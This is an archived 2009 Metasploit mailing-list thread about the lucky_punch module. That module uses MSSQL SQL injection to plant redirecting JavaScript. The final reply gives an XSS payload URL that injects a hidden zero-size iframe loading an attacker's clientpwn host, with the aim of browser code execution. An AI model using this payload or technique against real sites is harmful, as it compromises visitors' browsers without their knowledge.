lucky punch

[wullie19 at ntlworld.com (rogue)]

Hi friend 

just wanted to thanks a lot with your help on this I really appreciate it.

-rogue
 


> If your using XSS, its easy to use the metasploit clientpwn and just put an
> iframe in the XSS to load on port 80 on your affected host:
>
> http://xssvulnsite/Default.aspx?msg=<iframe src="http://clienpwnsystem";
> width="0" height="0" scrolling="no"></iframe>
>
> This would launch the site as normal and put a iframe that redirects toward
> the attackers system. Obviously don't have to use clientpwn, can pick
> whatever exploit you want however the user-agent functions with clientpwn
> is nice.
>
> Very simplistic attack for code execution on the affected browser...
>
>
>
> ________________________________
> From: rogue <wullie19 at ntlworld.com>
> Date: Thu, 2 Apr 2009 11:40:21 -0400
> To: Efrain Torres <etlownoise at gmail.com>
> Cc: <framework at spool.metasploit.com>
> Subject: Re: [framework] lucky punch
>
> Hi there
>
> Thanks for your help. Ive been looking at XSS to redirect someone from a
> web page to my server to launch some sort of browser attack. So this module
> uses sql injection on mssql to achive that?
>
> -rogue
>
> > Rogue,
> >
> > What are you trying to do with the module, can you please porvide more
> > details so i can help you better? Basically the module is used to
> > peform thru SQL injection (MSSQL) the modification of database tables
> > to store javascript code that may be displayed by an application to
> > redirect the user to a compromised webserver.
> >
> > ET
> >
> > On Thu, Apr 2, 2009 at 9:37 AM, rogue <wullie19 at ntlworld.com> wrote:
> > > Hi list.
> > >
> > > Can anyone give me some info on how the auxiliary module
> > > scanner/http/lucky_punch.rb is used?
> > >
> > > Thanks
> > > -rogue
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework